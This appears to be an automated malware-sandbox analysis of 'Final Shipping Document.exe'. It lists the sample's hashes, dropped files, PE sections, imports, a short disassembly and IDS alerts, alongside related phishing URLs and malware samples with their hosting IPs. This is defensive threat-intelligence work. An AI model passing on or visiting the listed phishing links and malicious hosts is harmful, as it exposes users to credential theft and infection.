                                                          https://123formbuilder.info/wj412l/#9ryano@vib.techGet hashmaliciousHTMLPhisherBrowse
                                                          • 104.17.25.14
                                                          file.exeGet hashmaliciousAmadey, Babadeda, RedLine, Stealc, VidarBrowse
                                                          • 104.21.72.79
                                                          file.exeGet hashmaliciousBabadeda, Coinhive, XmrigBrowse
                                                          • 172.64.41.3
                                                          https://storage.googleapis.com/3ee33d379fb68c2e6e88/3633420a894acb1dc7559f656#cl/0_smt/10/3617893/3293/0/0Get hashmaliciousPhisherBrowse
                                                          • 104.21.52.77
                                                          file.exeGet hashmaliciousBabadedaBrowse
                                                          • 172.64.41.3
                                                          FW_ Data Sync Completed Successfully - #BWYEIQF_.emlGet hashmaliciousUnknownBrowse
                                                          • 104.21.10.30
                                                          https://forms.office.com/e/4PVhav2XCGGet hashmaliciousUnknownBrowse
                                                          • 104.16.117.116
                                                          AKPSrAWl2G.elfGet hashmaliciousMiraiBrowse
                                                          • 1.8.62.115
                                                          https://pe-encrypt.statefarm.com/formpostdir/securereader?id=Lpcn7iyYhE0u8Rg0xxSBcOU-9IPSMsmm&brand=3993e80ababa08f55Get hashmaliciousUnknownBrowse
                                                          • 1.1.1.1
                                                          BILLY-AS-APAntboxNetworkCNNew Order#9.exeGet hashmaliciousFormBookBrowse
                                                          • 154.218.3.243
                                                          https://bet958z.com/Get hashmaliciousUnknownBrowse
                                                          • 185.121.169.26
                                                          https://7365bb.vip/Get hashmaliciousUnknownBrowse
                                                          • 185.121.169.26
                                                          http://18255.comGet hashmaliciousUnknownBrowse
                                                          • 156.227.29.156
                                                          INVOICE_PO.exeGet hashmaliciousFormBookBrowse
                                                          • 103.68.111.168
                                                          FhmDxxpEZM.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                          • 103.68.111.168
                                                          FfpHp8F4pY.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                          • 103.68.111.168
                                                          ungziped_file.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                          • 103.68.111.168
                                                          PAYMENT_DETAILS.xlsGet hashmaliciousFormBook, NSISDropperBrowse
                                                          • 156.227.28.51
                                                          piyMkUBOS9.exeGet hashmaliciousFormBookBrowse
                                                          • 156.227.28.33
                                                          DEDIPATH-LLCUSNew Order#9.exeGet hashmaliciousFormBookBrowse
                                                          • 178.212.35.248
                                                          LisectAVT_2403002C_83.exeGet hashmaliciousRedLineBrowse
                                                          • 45.9.20.20
                                                          PO#O_0140724.exeGet hashmaliciousFormBookBrowse
                                                          • 178.212.35.248
                                                          4qOdQ3lrYx.elfGet hashmaliciousMiraiBrowse
                                                          • 45.12.141.80
                                                          Update.jsGet hashmaliciousSocGholishBrowse
                                                          • 45.83.31.54
                                                          OaHosly9lyzkZ0G.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                          • 178.212.35.248
                                                          https://itaconsorciodigital.com.br/termosdeusoGet hashmaliciousUnknownBrowse
                                                          • 149.62.37.231
                                                          afn6Od8oV1sUzD6.exeGet hashmaliciousFormBookBrowse
                                                          • 178.212.35.248
                                                          swift copy.exeGet hashmaliciousFormBookBrowse
                                                          • 178.212.35.176
                                                          001.jarGet hashmaliciousUnknownBrowse
                                                          • 185.255.114.18
                                                          CLOUDFLARENETUShttps://forms.office.com/r/qq9c20HBqaGet hashmaliciousTycoon2FABrowse
                                                          • 104.17.25.14
                                                          https://123formbuilder.info/wj412l/#9ryano@vib.techGet hashmaliciousHTMLPhisherBrowse
                                                          • 104.17.25.14
                                                          file.exeGet hashmaliciousAmadey, Babadeda, RedLine, Stealc, VidarBrowse
                                                          • 104.21.72.79
                                                          file.exeGet hashmaliciousBabadeda, Coinhive, XmrigBrowse
                                                          • 172.64.41.3
                                                          https://storage.googleapis.com/3ee33d379fb68c2e6e88/3633420a894acb1dc7559f656#cl/0_smt/10/3617893/3293/0/0Get hashmaliciousPhisherBrowse
                                                          • 104.21.52.77
                                                          file.exeGet hashmaliciousBabadedaBrowse
                                                          • 172.64.41.3
                                                          FW_ Data Sync Completed Successfully - #BWYEIQF_.emlGet hashmaliciousUnknownBrowse
                                                          • 104.21.10.30
                                                          https://forms.office.com/e/4PVhav2XCGGet hashmaliciousUnknownBrowse
                                                          • 104.16.117.116
                                                          AKPSrAWl2G.elfGet hashmaliciousMiraiBrowse
                                                          • 1.8.62.115
                                                          https://pe-encrypt.statefarm.com/formpostdir/securereader?id=Lpcn7iyYhE0u8Rg0xxSBcOU-9IPSMsmm&brand=3993e80ababa08f55Get hashmaliciousUnknownBrowse
                                                          • 1.1.1.1
                                                          No context
                                                          No context
                                                          Process:C:\Windows\SysWOW64\gpupdate.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                          Category:dropped
                                                          Size (bytes):196608
                                                          Entropy (8bit):1.121297215059106
                                                          Encrypted:false
                                                          SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                          MD5:D87270D0039ED3A5A72E7082EA71E305
                                                          SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                          SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                          SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                          Malicious:false
                                                          Reputation:high, very likely benign file
                                                          Process:C:\Users\user\Desktop\Final Shipping Document.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):286720
                                                          Entropy (8bit):7.995387814214577
                                                          Encrypted:true
                                                          SSDEEP:6144:UR75V/AQ3ehrFlMbqcLgSGeGVDiPycUmuekIQ07hd6U:G3AQWMbqc0SGe4DgUmuek6dn
                                                          MD5:D20F10A61FA6A5BD26397F310E4A91AB
                                                          SHA1:D353BCBC9D7438045952D88DAB362D1E731C1767
                                                          SHA-256:F023B648CD6A7971D6E0E5F92BB827D24A1F33B76D9908E28D33DB0326392296
                                                          SHA-512:56C5BB63AB804DAB0CBD6BCC1CEF34CB43361330EF292D779C63699C02FAA9A74CA08D2108CC8607A5EF81658C72CDA6A3CAC808DD6FE57927F0008C3BE72448
                                                          Malicious:false
                                                          Reputation:low
                                                          Process:C:\Users\user\Desktop\Final Shipping Document.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):9768
                                                          Entropy (8bit):7.6308607833614435
                                                          Encrypted:false
                                                          SSDEEP:192:ZueSuy+g4uD+XOz0IkN35UQ6yU8ZI2qSaaYpkTKoF7Xb6Z:Zwb1+XhH351RU3BSa/pk1Y
                                                          MD5:54BCFB2F327E273114E428D10F2DCC5E
                                                          SHA1:9674DE209DC64240ECD5D03CB1843BBD13D78614
                                                          SHA-256:E65A9E1DA14F4F010D6AC31192FDBA537BBD0F9097CDE4D6E9BBA096D0DF03E3
                                                          SHA-512:AD08980B0460837915B4F3675DE6373B40C6289E3121C8DB405D30F364DBEB55A6FBC68E3C6087E58A4C6DA8ACF2BEBE77886858C7B718323AAE628031D36906
                                                          Malicious:false
                                                          Reputation:low
                                                          Process:C:\Users\user\Desktop\Final Shipping Document.exe
                                                          File Type:ASCII text, with very long lines (28674), with no line terminators
                                                          Category:dropped
                                                          Size (bytes):28674
                                                          Entropy (8bit):3.581720989903068
                                                          Encrypted:false
                                                          SSDEEP:768:Jx6TBScFCo3T3iCev73GntQUA+n++nmkE/ns62HzimL5sCWC:yTBScFCo3T3iPv73GntQUA+n++nmkE/I
                                                          MD5:4BF4F511BB2255763F52BF28E374F9F4
                                                          SHA1:6E620DF306D31E6FDA33FCC83ECF04885B2596F3
                                                          SHA-256:586F570E53668E3AEC1D9E01AAA5B77DE348F3DDACBE54D5C06DA1A4ABBC4052
                                                          SHA-512:7F368B5E6A80E8948C996BC7B57E3F7EB1B47853E12429B944F19406256B4CFC5D3F43D46ECF2D775A88FD3CC1D9E3F4A4831E7953AEE3FD469861F81D0368BC
                                                          Malicious:false
                                                          Process:C:\Users\user\Desktop\Final Shipping Document.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):286720
                                                          Entropy (8bit):7.995387814214577
                                                          Encrypted:true
                                                          SSDEEP:6144:UR75V/AQ3ehrFlMbqcLgSGeGVDiPycUmuekIQ07hd6U:G3AQWMbqc0SGe4DgUmuek6dn
                                                          MD5:D20F10A61FA6A5BD26397F310E4A91AB
                                                          SHA1:D353BCBC9D7438045952D88DAB362D1E731C1767
                                                          SHA-256:F023B648CD6A7971D6E0E5F92BB827D24A1F33B76D9908E28D33DB0326392296
                                                          SHA-512:56C5BB63AB804DAB0CBD6BCC1CEF34CB43361330EF292D779C63699C02FAA9A74CA08D2108CC8607A5EF81658C72CDA6A3CAC808DD6FE57927F0008C3BE72448
                                                          Malicious:false
                                                          File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                          Entropy (8bit):7.107057243739191
                                                          TrID:
                                                          • Win32 Executable (generic) a (10002005/4) 99.96%
                                                          • Generic Win/DOS Executable (2004/3) 0.02%
                                                          • DOS Executable Generic (2002/1) 0.02%
                                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                          File name:Final Shipping Document.exe
                                                          File size:1'225'216 bytes
                                                          MD5:2d3ecaf3008e1d47782f668f713b35b1
                                                          SHA1:35ea8d6a9836384c69829e1a87ddb08c1f647fc7
                                                          SHA256:c2c3f4d25be2c10f834a4804172d58ee35adc35accd66227d7d89d9ae978e04d
                                                          SHA512:244d36e73d7209bfd82e96d55a24956e88c73d9af96957053c5bef7e78b0cf4b4a4364eb7664ef165a4761f26bad61c05385076a10515fa8ac9eb2982104dc93
                                                          SSDEEP:24576:CqDEvCTbMWu7rQYlBQcBiT6rprG8aCMJb4CmSzh0u:CTvC/MTQYxsWR7aC8bsQu
                                                          TLSH:ED45CF0273D1C022FF9B92734F5AF6515ABC69260123E62F13A81D79BE701B1563E7A3
                                                          File Content Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......................j:......j:..C...j:......@.*...............................n.......~.............{.......{.......{.........z....
                                                          Icon Hash:aaf3e3e3938382a0
                                                          Entrypoint:0x420577
                                                          Entrypoint Section:.text
                                                          Digitally signed:false
                                                          Imagebase:0x400000
                                                          Subsystem:windows gui
                                                          Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                          DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                          Time Stamp:0x66A02797 [Tue Jul 23 21:58:47 2024 UTC]
                                                          TLS Callbacks:
                                                          CLR (.Net) Version:
                                                          OS Version Major:5
                                                          OS Version Minor:1
                                                          File Version Major:5
                                                          File Version Minor:1
                                                          Subsystem Version Major:5
                                                          Subsystem Version Minor:1
                                                          Import Hash:948cc502fe9226992dce9417f952fce3
                                                          Instruction
                                                          call 00007FB28D588393h
                                                          jmp 00007FB28D587C9Fh
                                                          push ebp
                                                          mov ebp, esp
                                                          push esi
                                                          push dword ptr [ebp+08h]
                                                          mov esi, ecx
                                                          call 00007FB28D587E7Dh
                                                          mov dword ptr [esi], 0049FDF0h
                                                          mov eax, esi
                                                          pop esi
                                                          pop ebp
                                                          retn 0004h
                                                          and dword ptr [ecx+04h], 00000000h
                                                          mov eax, ecx
                                                          and dword ptr [ecx+08h], 00000000h
                                                          mov dword ptr [ecx+04h], 0049FDF8h
                                                          mov dword ptr [ecx], 0049FDF0h
                                                          ret
                                                          push ebp
                                                          mov ebp, esp
                                                          push esi
                                                          push dword ptr [ebp+08h]
                                                          mov esi, ecx
                                                          call 00007FB28D587E4Ah
                                                          mov dword ptr [esi], 0049FE0Ch
                                                          mov eax, esi
                                                          pop esi
                                                          pop ebp
                                                          retn 0004h
                                                          and dword ptr [ecx+04h], 00000000h
                                                          mov eax, ecx
                                                          and dword ptr [ecx+08h], 00000000h
                                                          mov dword ptr [ecx+04h], 0049FE14h
                                                          mov dword ptr [ecx], 0049FE0Ch
                                                          ret
                                                          push ebp
                                                          mov ebp, esp
                                                          push esi
                                                          mov esi, ecx
                                                          lea eax, dword ptr [esi+04h]
                                                          mov dword ptr [esi], 0049FDD0h
                                                          and dword ptr [eax], 00000000h
                                                          and dword ptr [eax+04h], 00000000h
                                                          push eax
                                                          mov eax, dword ptr [ebp+08h]
                                                          add eax, 04h
                                                          push eax
                                                          call 00007FB28D58AA3Dh
                                                          pop ecx
                                                          pop ecx
                                                          mov eax, esi
                                                          pop esi
                                                          pop ebp
                                                          retn 0004h
                                                          lea eax, dword ptr [ecx+04h]
                                                          mov dword ptr [ecx], 0049FDD0h
                                                          push eax
                                                          call 00007FB28D58AA88h
                                                          pop ecx
                                                          ret
                                                          push ebp
                                                          mov ebp, esp
                                                          push esi
                                                          mov esi, ecx
                                                          lea eax, dword ptr [esi+04h]
                                                          mov dword ptr [esi], 0049FDD0h
                                                          push eax
                                                          call 00007FB28D58AA71h
                                                          test byte ptr [ebp+08h], 00000001h
                                                          pop ecx
                                                          Programming Language:
                                                          • [ C ] VS2008 SP1 build 30729
                                                          • [IMP] VS2008 SP1 build 30729
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xc8e64 | 0x17c | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xd4000 | 0x547fc | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x129000 | 0x7594 | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0xb0ff0 | 0x1c | .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0xc3400 | 0x18 | .rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0xb1010 | 0x40 | .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x9c000 | 0x894 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x9ab1d | 0x9ac00 | 0a1473f3064dcbc32ef93c5c8a90f3a6 | False | 0.565500681542811 | data | 6.668273581389308 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x9c000 | 0x2fb82 | 0x2fc00 | c9cf2468b60bf4f80f136ed54b3989fb | False | 0.35289185209424084 | data | 5.691811547483722 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0xcc000 | 0x706c | 0x4800 | 53b9025d545d65e23295e30afdbd16d9 | False | 0.04356553819444445 | DOS executable (block device driver @\273\) | 0.5846666986982398 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0xd4000 | 0x547fc | 0x54800 | 3b4b5368d1a22b317a7abcf50ffcf01e | False | 0.9228226701183432 | data | 7.881361748990998 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x129000 | 0x7594 | 0x7600 | c68ee8931a32d45eb82dc450ee40efc3 | False | 0.7628111758474576 | data | 6.7972128181359786 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0xd45a8 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.7466216216216216
RT_ICON | 0xd46d0 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colors | English | Great Britain | 0.3277027027027027
RT_ICON | 0xd47f8 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.3885135135135135
RT_ICON | 0xd4920 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 0 | English | Great Britain | 0.3333333333333333
RT_ICON | 0xd4c08 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 0 | English | Great Britain | 0.5
RT_ICON | 0xd4d30 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 0 | English | Great Britain | 0.2835820895522388
RT_ICON | 0xd5bd8 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 0 | English | Great Britain | 0.37906137184115524
RT_ICON | 0xd6480 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 0 | English | Great Britain | 0.23699421965317918
RT_ICON | 0xd69e8 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 0 | English | Great Britain | 0.13858921161825727
RT_ICON | 0xd8f90 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 0 | English | Great Britain | 0.25070356472795496
RT_ICON | 0xda038 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 0 | English | Great Britain | 0.3173758865248227
RT_MENU | 0xda4a0 | 0x50 | data | English | Great Britain | 0.9
RT_STRING | 0xda4f0 | 0x594 | data | English | Great Britain | 0.3333333333333333
RT_STRING | 0xdaa84 | 0x68a | data | English | Great Britain | 0.2735961768219833
RT_STRING | 0xdb110 | 0x490 | data | English | Great Britain | 0.3715753424657534
RT_STRING | 0xdb5a0 | 0x5fc | data | English | Great Britain | 0.3087467362924282
RT_STRING | 0xdbb9c | 0x65c | data | English | Great Britain | 0.34336609336609336
RT_STRING | 0xdc1f8 | 0x466 | data | English | Great Britain | 0.3605683836589698
RT_STRING | 0xdc660 | 0x158 | Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0 | English | Great Britain | 0.502906976744186
RT_RCDATA | 0xdc7b8 | 0x4bac2 | data | | | 1.0003258548042613
RT_GROUP_ICON | 0x12827c | 0x76 | data | English | Great Britain | 0.6610169491525424
RT_GROUP_ICON | 0x1282f4 | 0x14 | data | English | Great Britain | 1.25
RT_GROUP_ICON | 0x128308 | 0x14 | data | English | Great Britain | 1.15
RT_GROUP_ICON | 0x12831c | 0x14 | data | English | Great Britain | 1.25
RT_VERSION | 0x128330 | 0xdc | data | English | Great Britain | 0.6181818181818182
RT_MANIFEST | 0x12840c | 0x3ef | ASCII text, with CRLF line terminators | English | Great Britain | 0.5074478649453823
DLL | Import
WSOCK32.dll | gethostbyname, recv, send, socket, inet_ntoa, setsockopt, ntohs, WSACleanup, WSAStartup, sendto, htons, __WSAFDIsSet, select, accept, listen, bind, inet_addr, ioctlsocket, recvfrom, WSAGetLastError, closesocket, gethostname, connect
VERSION.dll | GetFileVersionInfoW, VerQueryValueW, GetFileVersionInfoSizeW
WINMM.dll | timeGetTime, waveOutSetVolume, mciSendStringW
COMCTL32.dll | ImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
MPR.dll | WNetGetConnectionW, WNetCancelConnection2W, WNetUseConnectionW, WNetAddConnection2W
WININET.dll | HttpOpenRequestW, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, InternetConnectW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetQueryDataAvailable
PSAPI.DLL | GetProcessMemoryInfo
IPHLPAPI.DLL | IcmpSendEcho, IcmpCloseHandle, IcmpCreateFile
USERENV.dll | DestroyEnvironmentBlock, LoadUserProfileW, CreateEnvironmentBlock, UnloadUserProfile
UxTheme.dll | IsThemeActive
KERNEL32.dll | DuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, GetLongPathNameW, GetShortPathNameW, DeleteFileW, IsDebuggerPresent, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, LoadResource, LockResource, SizeofResource, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, LoadLibraryW, GetLocalTime, CompareStringW, GetCurrentThread, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, VirtualAlloc, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, ResetEvent, WaitForSingleObjectEx, IsProcessorFeaturePresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, CloseHandle, GetFullPathNameW, GetStartupInfoW, GetSystemTimeAsFileTime, InitializeSListHead, RtlUnwind, SetLastError, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, ResumeThread, FreeLibraryAndExitThread, GetACP, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetStringTypeW, GetFileType, SetStdHandle, GetConsoleCP, GetConsoleMode, ReadConsoleW, GetTimeZoneInformation, FindFirstFileExW, IsValidCodePage, GetOEMCP, GetCPInfo, GetCommandLineA, GetCommandLineW, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetEnvironmentVariableA, SetCurrentDirectoryW, FindNextFileW, WriteConsoleW
USER32.dll | GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, PeekMessageW, GetInputState, UnregisterHotKey, CharLowerBuffW, MonitorFromPoint, MonitorFromRect, LoadImageW, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, ClientToScreen, GetCursorPos, DeleteMenu, CheckMenuRadioItem, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, SystemParametersInfoW, LockWindowUpdate, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, RegisterHotKey, GetCursorInfo, SetWindowPos, CopyImage, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, TrackPopupMenuEx, GetMessageW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, DispatchMessageW, keybd_event, TranslateMessage, ScreenToClient
GDI32.dll | EndPath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, GetDeviceCaps, SetPixel, CloseFigure, LineTo, AngleArc, MoveToEx, Ellipse, CreateCompatibleBitmap, CreateCompatibleDC, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, SelectObject, StretchBlt, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, GetStockObject, CreateDCW, GetPixel, DeleteDC, GetDIBits, StrokePath
COMDLG32.dll | GetSaveFileNameW, GetOpenFileNameW
ADVAPI32.dll | GetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, FreeSid, GetTokenInformation, RegCreateKeyExW, GetSecurityDescriptorDacl, GetAclInformation, GetUserNameW, AddAce, SetSecurityDescriptorDacl, InitiateSystemShutdownExW
SHELL32.dll | DragFinish, DragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW
ole32.dll | CoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket
OLEAUT32.dll | CreateStdDispatch, CreateDispTypeInfo, UnRegisterTypeLib, UnRegisterTypeLibForUser, RegisterTypeLibForUser, RegisterTypeLib, LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, VariantChangeType, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, SysStringLen, QueryPathOfRegTypeLib, SysAllocString, VariantInit, VariantClear, DispCallFunc, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, SafeArrayDestroyDescriptor, VariantCopy, OleLoadPicture
Language of compilation system | Country where language is spoken
English | Great Britain
Timestamp | Protocol | SID | Signature | Source Port | Dest Port | Source IP | Dest IP
2024-07-26T18:45:24.949358+0200 | TCP | 2022930 | ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow | 443 | 55136 | 20.114.59.183 | 192.168.2.5
2024-07-26T18:45:27.280649+0200 | TCP | 2022930 | ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow | 443 | 55137 | 20.114.59.183 | 192.168.2.5
2024-07-26T18:45:15.652468+0200 | TCP | 2022930 | ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow | 443 | 49705 | 20.114.59.183 | 192.168.2.5
